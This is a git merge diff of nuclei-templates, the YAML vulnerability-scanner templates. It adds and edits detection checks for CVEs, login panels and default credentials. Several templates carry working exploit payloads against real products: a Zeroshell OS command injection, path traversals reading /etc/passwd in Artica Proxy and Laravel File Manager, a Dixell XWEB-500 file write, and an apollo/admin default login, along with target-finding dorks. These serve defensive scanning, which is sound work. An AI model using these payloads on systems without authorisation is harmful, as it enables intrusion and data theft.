Merge branch 'projectdiscovery:master' into dashboard

.new-additions

@@ -1,15 +1,21 @@
 cves/2017/CVE-2017-9833.yaml
+cves/2020/CVE-2020-13158.yaml
 cves/2020/CVE-2020-15050.yaml
 cves/2020/CVE-2020-7943.yaml
 cves/2021/CVE-2021-3002.yaml
 cves/2022/CVE-2022-0381.yaml
 cves/2022/CVE-2022-23779.yaml
 cves/2022/CVE-2022-24990.yaml
+default-logins/apollo/apollo-default-login.yaml
 default-logins/digitalrebar/digitalrebar-default-login.yaml
 dns/caa-fingerprint.yaml
 exposed-panels/kentico-login.yaml
+exposed-panels/laravel-filemanager.yaml
 exposed-panels/matomo-login-portal.yaml
 exposed-panels/puppetboard-panel.yaml
+exposed-panels/xweb500-panel.yaml
 technologies/puppetdb-detect.yaml
 technologies/puppetserver-detect.yaml
+vulnerabilities/other/dixell-xweb500-filewrite.yaml
+vulnerabilities/other/laravel-filemanager-lfi.yaml
 vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml

cves/2019/CVE-2019-12725.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-12725
 
 info:
   name: Zeroshell 3.9.0 Remote Command Execution
-  author: dwisiswant0
+  author: dwisiswant0,akincibor
   severity: critical
   description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
   remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
@@ -20,14 +20,17 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
+        part: body
         regex:
-          - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
+          - "root:.*:0:0:"
 
 # Enhanced by mp on 2022/02/04

cves/2020/CVE-2020-13158.yaml

@@ -0,0 +1,31 @@
+id: CVE-2020-13158
+info:
+  name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
+  reference:
+    - https://github.com/InfoSec4Fun/CVE-2020-13158
+    - https://sourceforge.net/projects/artica-squid/files/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13158
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-13158
+    cwe-id: CWE-22
+  tags: cve,cve2020,artica,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-3654.yaml

@@ -3,12 +3,17 @@ id: CVE-2021-3654
 info:
   name: noVNC Open Redirect
   author: geeknik
-  severity: low
+  severity: medium
   description: A user-controlled input redirects noVNC users to an external website.
   reference:
     - https://seclists.org/oss-sec/2021/q3/188
     - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
   tags: redirect,novnc,cve,cve2021
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-3654
+    cwe-id: CWE-601
 
 requests:
   - method: GET

default-logins/apollo/apollo-default-login.yaml

@@ -0,0 +1,46 @@
+id: apollo-default-login
+
+info:
+  name: Apollo Default Login
+  author: PaperPen
+  severity: high
+  metadata:
+    shodan-query: http.favicon.hash:11794165
+  reference: https://github.com/apolloconfig/apollo
+  tags: apollo,default-login
+
+requests:
+  - raw:
+      - |
+        POST /signin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/signin?
+
+        username={{user}}&password={{pass}}&login-submit=Login
+
+      - |
+        GET /user HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: pitchfork
+    payloads:
+      user:
+        - apollo
+      pass:
+        - admin
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '"userId":'
+          - '"email":'
+        condition: or
+
+      - type: status
+        status:
+          - 200

exposed-panels/axigen-webmail.yaml

@@ -2,7 +2,7 @@ id: axigen-webmail
 
 info:
   name: Axigen WebMail
-  author: dhiyaneshDk
+  author: dhiyaneshDk,idealphase
   severity: info
   description: This template determines if Axigen Webmail is running.
   reference:
@@ -18,12 +18,19 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - '<title>Axigen WebMail</title>'
+      - type: regex
+        regex:
+          - '(?i)(Axigen WebMail)'
+          - '<title>Axigen Standard Webmail - (.*)</title>'
+        condition: or
 
       - type: status
         status:
           - 200
 
-# Enhanced by cs on 2022/02/25
+    extractors:
+      - type: regex
+        group: 1
+        part: body
+        regex:
+          - '<script type="text\/javascript" src="js\/lib_login\.js\?v=(.+)"><\/script>'

exposed-panels/kibana-panel.yaml

@@ -2,7 +2,7 @@ id: kibana-panel
 
 info:
   name: Kibana Panel Login
-  author: petruknisme,daffainfo
+  author: petruknisme,daffainfo,c-sh0
   severity: info
   metadata:
     shodan-query: http.title:"Kibana"
@@ -11,16 +11,24 @@ info:
 requests:
   - method: GET
     path:
+      - "{{BaseURL}}"
       - "{{BaseURL}}/login"
+      - "{{BaseURL}}/app/kibana"
 
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
     matchers-condition: or
     matchers:
       - type: word
         part: body
         words:
           - "<title>Kibana</title>"
+          - "<title>Elastic</title>"
+          - "<title>Kibana Login</title>"
+        condition: or
 
-      - type: word
+      - type: regex
         part: header
-        words:
-          - "Kbn-Name:"
+        regex:
+          - '(?i)(Kbn-Name)'

exposed-panels/laravel-filemanager.yaml

@@ -0,0 +1,24 @@
+id: laravel-filemanager
+
+info:
+  name: Laravel FileManager Panel Detect
+  author: princechaddha
+  severity: info
+  reference: https://github.com/UniSharp/laravel-filemanager
+  tags: laravel,filemanager,fileupload
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/laravel-filemanager?type=Files"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Laravel FileManager"
+
+      - type: status
+        status:
+          - 200

exposed-panels/xweb500-panel.yaml

@@ -0,0 +1,25 @@
+id: xweb500-panel
+
+info:
+  name: Xweb500 Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    google-dork: inurl:"xweb500.cgi"
+  tags: panel,xweb500
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/xweb500.cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Xweb500</title>"
+
+      - type: status
+        status:
+          - 200

exposures/configs/dbeaver-credentials.yaml

@@ -21,10 +21,15 @@ requests:
           - 200
 
       - type: word
+        part: header
         words:
           - "application/octet-stream"
-        part: header
 
       - type: dsl
         dsl:
           - 'len(body) > 2'
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<html')"
+          - "!contains(tolower(body), '<body')"

vulnerabilities/other/dixell-xweb500-filewrite.yaml

@@ -0,0 +1,35 @@
+id: dixell-xweb500-filewrite
+
+info:
+  name: Dixell XWEB-500 - Arbitrary File Write
+  author: hackerarpan
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/50639
+  metadata:
+    google-dork: inurl:"xweb500.cgi"
+  tags: lfw,iot,dixell,xweb500
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/octet-stream
+
+        {{randstr}}.txt
+        dixell-xweb500-filewrite
+
+      - |
+        GET /logo/{{randstr}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "dixell-xweb500-filewrite")'
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/laravel-filemanager-lfi.yaml

@@ -0,0 +1,28 @@
+id: laravel-filemanager-lfi
+info:
+  name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+  author: hackerarpan
+  severity: high
+  reference:
+    - https://www.exploit-db.com/exploits/48166
+    - https://github.com/UniSharp/laravel-filemanager
+  metadata:
+    google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+    shodan-query: http.html:"Laravel FileManager"
+  tags: lfi,unisharp,laravel,filemanager,fileupload,lfr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200